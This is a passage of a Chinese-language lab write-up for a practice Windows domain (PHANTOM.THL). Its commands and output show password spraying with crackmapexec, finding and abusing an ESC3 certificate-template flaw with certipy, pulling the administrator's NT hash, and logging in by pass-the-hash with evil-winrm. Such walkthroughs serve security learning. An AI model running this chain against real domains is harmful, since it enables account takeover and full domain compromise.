primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 134161673885023278
sAMAccountName                  : dev_test
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : dev_test@PHANTOM.THL
uSNChanged                      : 12981
uSNCreated                      : 12845
whenChanged                     : 2/21/2026 7:16:40 PM
whenCreated                     : 2/21/2026 6:09:48 PM
PropertyNames                   : {accountExpires, badPasswordTime, badPwdCount, CanonicalName...}
AddedProperties                 : {}
RemovedProperties               : {}
ModifiedProperties              : {}
PropertyCount                   : 41

其中的 Description 字符串看起来像一串密码,尝试爆破

[/home/kali/temp]$ crackmapexec smb 192.168.56.100 -u users.txt -p 'f6Y%UPa6ZB9eR5wG9$an' 
SMB         192.168.56.100  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:False)
SMB         192.168.56.100  445    DC01             [-] PHANTOM.THL\LegacyAdmins:f6Y%UPa6ZB9eR5wG9$an STATUS_LOGON_FAILURE 
SMB         192.168.56.100  445    DC01             [-] PHANTOM.THL\robert:f6Y%UPa6ZB9eR5wG9$an STATUS_LOGON_FAILURE 
SMB         192.168.56.100  445    DC01             [+] PHANTOM.THL\tomas:f6Y%UPa6ZB9eR5wG9$an 

ESC3

刚刚的留言里提到过证书,尝试寻找证书漏洞

[/home/kali/temp]$ certipy find -u tomas@phantom.thl -p 'f6Y%UPa6ZB9eR5wG9$an' -dc-ip 192.168.56.100 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'PHANTOM-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'PHANTOM-DC01-CA'
[*] Checking web enrollment for CA 'PHANTOM-DC01-CA' @ 'DC01.PHANTOM.THL'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260713215038_Certipy.txt'
[*] Wrote text output to '20260713215038_Certipy.txt'
[*] Saving JSON output to '20260713215038_Certipy.json'
[*] Wrote JSON output to '20260713215038_Certipy.json'
[/home/kali/temp]$ cat 20260713215038_Certipy.txt                                                               
Certificate Authorities
  0
    CA Name                             : PHANTOM-DC01-CA
    DNS Name                            : DC01.PHANTOM.THL
    Certificate Subject                 : CN=PHANTOM-DC01-CA, DC=PHANTOM, DC=THL
    Certificate Serial Number           : 161A58313EFA72A045F730EFC3CFED39
    Certificate Validity Start          : 2026-02-21 23:23:37+00:00
    Certificate Validity End            : 2031-02-21 23:33:37+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : PHANTOM.THL\Administrators
      Access Rights
        ManageCa                        : PHANTOM.THL\Administrators
                                          PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
        ManageCertificates              : PHANTOM.THL\Administrators
                                          PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
        Enroll                          : PHANTOM.THL\Authenticated Users
Certificate Templates
  0
    Template Name                       : Phantom-DevAuth
    Display Name                        : Phantom-DevAuth
    Certificate Authorities             : PHANTOM-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2026-02-21T23:36:09+00:00
    Template Last Modified              : 2026-02-21T23:37:14+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : PHANTOM.THL\Tomas
                                          PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
      Object Control Permissions
        Owner                           : PHANTOM.THL\Administrador
        Full Control Principals         : PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
        Write Owner Principals          : PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
        Write Dacl Principals           : PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
        Write Property Enroll           : PHANTOM.THL\Admins. del dominio
                                          PHANTOM.THL\Administradores de empresas
    [+] User Enrollable Principals      : PHANTOM.THL\Tomas
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.

发现 ESC3 ,跟着流程走就行了:06 ‐ Privilege Escalation · ly4k/Certipy Wiki

Step 1: 使用 Tomas 获取 Enrollment Agent 证书

[/home/kali/temp]$ certipy req \
    -u 'tomas@phantom.thl' -p 'f6Y%UPa6ZB9eR5wG9$an' \
    -dc-ip '192.168.56.100' -target 'DC01.PHANTOM.THL' \
    -ca 'PHANTOM-DC01-CA' -template 'Phantom-DevAuth' \
    -out 'tomas_agent'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 12
[*] Successfully requested certificate
[*] Got certificate with UPN 'tomas@PHANTOM.THL'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'tomas_agent.pfx'
[*] Wrote certificate and private key to 'tomas_agent.pfx'

Step 2: 使用代理证书请求管理员证书,(注意这里是西班牙语 administrador

[/home/kali/temp]$ certipy req \
    -u 'tomas@phantom.thl' -p 'f6Y%UPa6ZB9eR5wG9$an' \
    -dc-ip '192.168.56.100' -target 'DC01.PHANTOM.THL' \
    -ca 'PHANTOM-DC01-CA' -template 'User' \
    -pfx 'tomas_agent.pfx' -on-behalf-of 'PHANTOM\Administrador' \
    -out 'administrador'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrador@PHANTOM.THL'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrador.pfx'
[*] Wrote certificate and private key to 'administrador.pfx'

Step 3: 获取管理员 TGTNTLM Hash

[/home/kali/temp]$ certipy auth -pfx 'administrador.pfx' -dc-ip '192.168.56.100'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrador@PHANTOM.THL'
[*] Using principal: 'administrador@phantom.thl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrador.ccache'
[*] Wrote credential cache to 'administrador.ccache'
[*] Trying to retrieve NT hash for 'administrador'
[*] Got hash for 'administrador@phantom.thl': aad3b435b51404eeaad3b435b51404ee:dda94fc1fe<hidden>

然后远程登录拿到 root.txt

[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u administrador -H 'dda94fc1fe<HIDDEN>'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> dir
*Evil-WinRM* PS C:\Users\Administrador\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrador\desktop> dir


    Directorio: C:\Users\Administrador\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/22/2026   3:01 AM             33 root.txt